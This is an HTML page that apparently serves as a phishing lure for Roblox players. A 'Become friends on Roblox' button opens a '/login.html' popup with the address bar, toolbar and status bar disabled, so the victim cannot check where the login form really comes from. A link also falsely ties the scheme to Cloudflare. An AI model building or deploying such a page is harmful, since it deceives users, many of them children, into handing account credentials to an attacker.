<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Vrienden</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: black;
            background-image: url(blog_evergreen.png);
        }
        .container {
            text-align: center;
            background: white;
            padding: 20px;
            margin-top: 150px;
            border-radius: 10px;
            background-color: gray;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
        }
        .btn {
            background-color: #00a2ff;
            color: white;
            padding: 15px 25px;
            margin-top: 30px;
            border: none;
            border-radius: 5px;
            text-decoration: none;
            font-size: 16px;
            cursor: pointer;
        }
        .btn:hover {
            background-color: #008ed6;
        }
    </style>
</head>
<body>
    <script language="JavaScript">
        function openWindow() {
            var width = 600;
            var height = 600;
            var left = (screen.width - width) / 2;
            var top = (screen.he - height) / 2;
            //window.open("/login.html", "_blank", "toolbar=no,scrollbars=yes,resizable=no,top="+top+",left="+left+",width=400,height=400");
            window.open('/login.html','winname','directories=no,titlebar=no,toolbar=no,location=no,status=no,menubar=no,scrollbars=no,resizable=no,width=600,height=600');

        }
        </script>
    <div class="container">
        <h1>Become friends on Roblox</h1>
        <p>Click on the button below to Become friends on Roblox!</p>
        <br>
        <a href="" class="btn" target="_blank" onclick="openWindow()">Become friends</a>
        <br>
        <h5><a style="color: black; text-decoration: none;" href="https://www.cloudflare.com/" >Generate your own stylefull frend request with cloudflare</a></h5>
    </div>
</body>
</html>





